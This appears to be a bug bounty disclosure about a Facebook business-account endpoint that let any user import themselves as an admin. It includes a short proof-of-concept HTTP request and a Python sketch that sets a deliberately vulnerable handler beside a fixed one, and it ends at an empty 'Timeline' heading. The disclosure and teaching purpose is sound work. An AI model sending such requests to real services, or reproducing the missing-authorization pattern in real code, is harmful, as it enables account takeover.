There is a call to import admins into a business account. At the time, the call did not appear to enforce any permission check on the caller, so it was possible to add oneself as an admin of any business.

Proof of Concept

HTTP POST /business/aymc_assets/admins/import/
Host: facebook.com

business_id=TARGET_BUSINESS_ID
admin_id=MALICIOUS_USER_ID
session_id=SESSION_ID

This will add the user to the business as an administrator.
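To make the missing check concrete, here is an added illustration (not Facebook's code, and not part of the original report) of a hypothetical import-admin handler in its vulnerable form next to a hardened one. All names (Business, BUSINESSES, SESSIONS, import_admin_*) are assumptions; the point is that the caller must be resolved from the session and must already hold an admin role on the target business before the import is allowed.

```python
# Added illustration of the missing-authorization bug described above.
# Hypothetical names throughout; this is not Facebook's code.
from dataclasses import dataclass, field


@dataclass
class Business:
    business_id: str
    admins: set[str] = field(default_factory=set)


# Constructed sample state: one business with a single legitimate admin.
BUSINESSES = {"biz-100": Business("biz-100", admins={"user-alice"})}
# Constructed session table: session id -> authenticated user id.
SESSIONS = {"sess-alice": "user-alice", "sess-mallory": "user-mallory"}


def import_admin_vulnerable(business_id: str, admin_id: str, session_id: str) -> bool:
    """Mirrors the reported behaviour: any authenticated session can add any
    admin_id to any business_id. The caller's role is never consulted."""
    if session_id not in SESSIONS or business_id not in BUSINESSES:
        return False
    BUSINESSES[business_id].admins.add(admin_id)
    return True


def import_admin_fixed(business_id: str, admin_id: str, session_id: str) -> bool:
    """Same operation with the authorization check in place: the caller is
    taken from the server-side session (never from the request body) and must
    already be an admin of the target business."""
    caller = SESSIONS.get(session_id)
    business = BUSINESSES.get(business_id)
    if caller is None or business is None:
        return False
    if caller not in business.admins:  # the check the endpoint was missing
        return False
    business.admins.add(admin_id)
    return True


if __name__ == "__main__":
    # A session with no role on biz-100 is refused by the fixed handler.
    print(import_admin_fixed("biz-100", "user-mallory", "sess-mallory"))
    # An existing admin may still import a new admin.
    print(import_admin_fixed("biz-100", "user-bob", "sess-alice"))
```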

Impact

This could have let an attacker without any existing role on a business take over any business account and gain access to the business assets connected to it (Facebook pages, ad accounts, applications, Instagram accounts).

Timeline